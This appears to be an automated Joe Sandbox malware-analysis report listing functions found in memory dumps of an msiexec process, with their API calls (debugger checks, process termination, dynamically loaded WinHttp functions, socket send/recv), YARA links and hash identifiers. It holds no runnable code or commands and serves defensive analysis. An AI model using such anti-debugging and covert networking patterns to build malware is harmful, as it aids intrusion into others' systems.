                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                          • Opcode ID: 76c93ceba45ae7e15f1049c7d308057ccb5cc87addb108dce216c3942d05f881
                                                                                                                                                                                                          • Instruction ID: b7f3ab2296e2f03f94fdb510b455088553bb1b7af9d1e147006953f9b0a756b0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76c93ceba45ae7e15f1049c7d308057ccb5cc87addb108dce216c3942d05f881
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A310AB5C4222D9FCB21DFA5D948ACDBBB8EF05301F1041AAE40DA7210EB355A84CF94
                                                                                                                                                                                                          Function 21DE2639 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 21DE2645
                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 21DE2710
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 21DE2730
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 21DE273A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                          • Opcode ID: c17283e8f32ff34771a917e69eb51937f95322b51eebc4386f891493d758fb3f
                                                                                                                                                                                                          • Instruction ID: 5e2c7702fd5203d4e8f46398079608f20865d3b83be6f9c245f35603fbc76473
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c17283e8f32ff34771a917e69eb51937f95322b51eebc4386f891493d758fb3f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE313875D85219DFDF11DFA0C9897CDBBB8AF08301F1040AAE40CAB250EBB59B858F54
                                                                                                                                                                                                          Function 214DB15B Relevance: 6.1, APIs: 4, Instructions: 53timethreadCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 214DB18F
                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 214DB19E
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 214DB1A7
                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 214DB1B4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                          • Opcode ID: 2954d3657db124bd7b18d3c8cd770512ac3b2350697527267ce6a076489ce11e
                                                                                                                                                                                                          • Instruction ID: ed5b4f4a18c37357fcfb1a33943e6ac43b708058055ac2540d80412f4166db47
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2954d3657db124bd7b18d3c8cd770512ac3b2350697527267ce6a076489ce11e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8114CB6D45108AFDF28CFB8C958A9EB7B5EB09351F51046AD90AE7340EF749A10CB90
                                                                                                                                                                                                          Function 21DE2B1C Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,21DE2C3B,21DED1DC,00000017), ref: 21DE2B21
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(21DED1DC,?,21DE2C3B,21DED1DC,00000017), ref: 21DE2B2A
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409,?,21DE2C3B,21DED1DC,00000017), ref: 21DE2B35
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,21DE2C3B,21DED1DC,00000017), ref: 21DE2B3C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3231755760-0
                                                                                                                                                                                                          • Opcode ID: 45607a8f2b0d12cb5d731440f60ccf86f925a061dab798fd601f114794f07fea
                                                                                                                                                                                                          • Instruction ID: 011f3288565ce3696858505cbf28312168a5c461326a05a2a636cbaf8258adb8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45607a8f2b0d12cb5d731440f60ccf86f925a061dab798fd601f114794f07fea
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CD00271084614EFD7102BE1DD0DA593F28EB046A7F484410F71986451DF7B9566CB55
                                                                                                                                                                                                          Function 214DB299 Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,214DB3B8,214F2310,00000017), ref: 214DB29E
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(214F2310,?,214DB3B8,214F2310,00000017), ref: 214DB2A7
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409,?,214DB3B8,214F2310,00000017), ref: 214DB2B2
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,214DB3B8,214F2310,00000017), ref: 214DB2B9
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3231755760-0
                                                                                                                                                                                                          • Opcode ID: 295bde299dbd63cb7fbb809c1f7a8ae4a2d88a6c83c87e371fa90da2116a3d77
                                                                                                                                                                                                          • Instruction ID: 12945bd6021ef721f82408d7312d141b6104968db6bbb5aa50a255df04a7b2e4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 295bde299dbd63cb7fbb809c1f7a8ae4a2d88a6c83c87e371fa90da2116a3d77
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82D0CAB3082208FFDB002BE0C80CE083A2AEB08216F008000FB0E82240CE39C420CBA9
                                                                                                                                                                                                          Function 21DE60E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 21DE61DA
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 21DE61E4
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 21DE61F1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                          • Opcode ID: f33e5e4f9612b1a976dad20a19650e6babd2e4ec17d26bb63a6bcc4a4d9d7bb1
                                                                                                                                                                                                          • Instruction ID: e81238ffff4876755b78350af0827443e90f73535b267b97efce64400a2b683d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f33e5e4f9612b1a976dad20a19650e6babd2e4ec17d26bb63a6bcc4a4d9d7bb1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B31057494122CEBCB61DF64C88878DBBB8BF08311F1041DAE81CA7260EB349F918F54
                                                                                                                                                                                                          Function 214DD8D1 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,214DA5B7), ref: 214DD9C9
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,214DA5B7), ref: 214DD9D3
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(00000016,?,?,?,?,?,214DA5B7), ref: 214DD9E0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                          • Opcode ID: 07409babeb1a7cc53d2febb0ac5013a3b5c1c4f87a4c915ca6b2587ee366a873
                                                                                                                                                                                                          • Instruction ID: e47a516f4d23859c1469fef13c617b87cd1c51e8d2b929c9325b2ecf0cc2fade
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07409babeb1a7cc53d2febb0ac5013a3b5c1c4f87a4c915ca6b2587ee366a873
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F131D6B594121D9BCF21DF64DC88B8CBBB4BF19710F5042DAE91CA7250EB349B818F44
                                                                                                                                                                                                          Function 21DE4AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,21DE4A8A,?,21DF2238,0000000C,21DE4BBD,00000000,00000000,?,21DE2082,21DF2108,0000000C,21DE1F3A,?), ref: 21DE4AD5
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,21DE4A8A,?,21DF2238,0000000C,21DE4BBD,00000000,00000000,?,21DE2082,21DF2108,0000000C,21DE1F3A,?), ref: 21DE4ADC
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 21DE4AEE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                          • Opcode ID: cb4fa0859badd9bc0bc414410a651c62225caf694442aa29dfe477ee193f897c
                                                                                                                                                                                                          • Instruction ID: da3758a95726f937de292f2200e47c0c089a47deba6cd7b51dbdd41a7ed94eff
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb4fa0859badd9bc0bc414410a651c62225caf694442aa29dfe477ee193f897c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DBE0BF35040615EFCF026F54CD0DA4A3F6AEF49397F544018F9198B522DB3AE992CB54
                                                                                                                                                                                                          Function 214E4BBC Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,214E4B92,00000000,214F9B98,0000000C,214E4CDA,00000000,00000002,00000000), ref: 214E4BDD
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,214E4B92,00000000,214F9B98,0000000C,214E4CDA,00000000,00000002,00000000), ref: 214E4BE4
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 214E4BF6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                          • Opcode ID: 521cd59ba0040e30d2f8b0e4be969827c128a830c82c904af4f4bd0e83f1c083
                                                                                                                                                                                                          • Instruction ID: a720d231ccdccff9c96db4bbb14e6675747b01678779fe876e7198a5b8f63a96
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 521cd59ba0040e30d2f8b0e4be969827c128a830c82c904af4f4bd0e83f1c083
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24E04F35000148AFCF026F10CA0CE483F69EB59753B404018FE0D8B621CF39E952CB80
                                                                                                                                                                                                          Function 214DAE1D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A,?), ref: 214DAE36
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2325560087-3916222277
                                                                                                                                                                                                          • Opcode ID: 60fe57edf2bb24f63e4180f3edad0b688364842e414af12ba53800d9a34d6984
                                                                                                                                                                                                          • Instruction ID: 11be32dd1ac334d853b8eaa16fc30ac285b4be1789f03a8ae8fcf8a16c169d67
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60fe57edf2bb24f63e4180f3edad0b688364842e414af12ba53800d9a34d6984
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 895138B2D402068FEB14CFA5C4A169ABBF4EB49355F2084AFD41DE7740D7389A54CB50
                                                                                                                                                                                                          Function 214E9ACA Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                          • Opcode ID: f7d0d56855cc0e9b491b1ed043c87e6eec9789ffa457e803037bcc30ab8758c8
                                                                                                                                                                                                          • Instruction ID: 6e032b3bf241d065e4bc1906961897fd56810d5662ffc719ef6de85f0250ab29
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7d0d56855cc0e9b491b1ed043c87e6eec9789ffa457e803037bcc30ab8758c8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CA011B028020A8F83008F388208B0A3AEABB002883808028A808C2200EF288030CB02
                                                                                                                                                                                                          Function 214D7310 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(winhttp.dll,?,214D2B6F), ref: 214D7316
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 214D7333
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,WinHttpConnect), ref: 214D7340
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,WinHttpOpenRequest), ref: 214D734D
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,WinHttpSendRequest), ref: 214D735A
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,WinHttpReceiveResponse), ref: 214D7367
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,WinHttpQueryDataAvailable), ref: 214D7374
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,WinHttpReadData), ref: 214D7381
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 214D738E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                          • String ID: WinHttpCloseHandle$WinHttpConnect$WinHttpOpen$WinHttpOpenRequest$WinHttpQueryDataAvailable$WinHttpReadData$WinHttpReceiveResponse$WinHttpSendRequest$winhttp.dll
                                                                                                                                                                                                          • API String ID: 2238633743-1483618772
                                                                                                                                                                                                          • Opcode ID: b1cd8c329b71fbfbed3e930634eeabd168845e2fe58405cd65df44883afea5a2
                                                                                                                                                                                                          • Instruction ID: 14c0fa1a62bfd75c9915d697ddee3458f38601882c70242e9efa7d5cf523b05a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1cd8c329b71fbfbed3e930634eeabd168845e2fe58405cd65df44883afea5a2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1118C71890318EAEF108F369959F667EE8AB42A49F10123FA50C96394DFBC81A4DF50
                                                                                                                                                                                                          Function 214D86B0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 195networkCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • select.WS2_32(00000000,00000000,00000000,00000000,?), ref: 214D86FE
                                                                                                                                                                                                          • select.WS2_32(?,00000001,00000000,00000000,?), ref: 214D8792
                                                                                                                                                                                                          • recv.WS2_32(?,?,000005DC,00000000), ref: 214D87C5
                                                                                                                                                                                                          • WSAGetLastError.WS2_32 ref: 214D87D2
                                                                                                                                                                                                          • WSAGetLastError.WS2_32 ref: 214D87DF
                                                                                                                                                                                                          • send.WS2_32(?,?,?,00000000), ref: 214D885F
                                                                                                                                                                                                          • WSAGetLastError.WS2_32 ref: 214D8871
                                                                                                                                                                                                          • WSAGetLastError.WS2_32 ref: 214D887A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLast$select$recvsend
                                                                                                                                                                                                          • String ID: Connection closed!$Connection error!
                                                                                                                                                                                                          • API String ID: 4255854023-2305758303
                                                                                                                                                                                                          • Opcode ID: 61c7b33afa7d09e870cb8e2b482d3ecdef9cdc321f89b90014666bfbc6d35aa1
                                                                                                                                                                                                          • Instruction ID: 2a0b092073651afd2a95abf4fd12b62023c379c7eccda434036a9ab6d1c1f5b0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61c7b33afa7d09e870cb8e2b482d3ecdef9cdc321f89b90014666bfbc6d35aa1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72718072A0060BAFDB05CF64DD95B69BBB8BB55700F04427AE90CD6A40DB74EA60CF90
                                                                                                                                                                                                          Function 214D64B0 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 249COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?,-00000002), ref: 214D65F7
                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?,00000006), ref: 214D6793
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
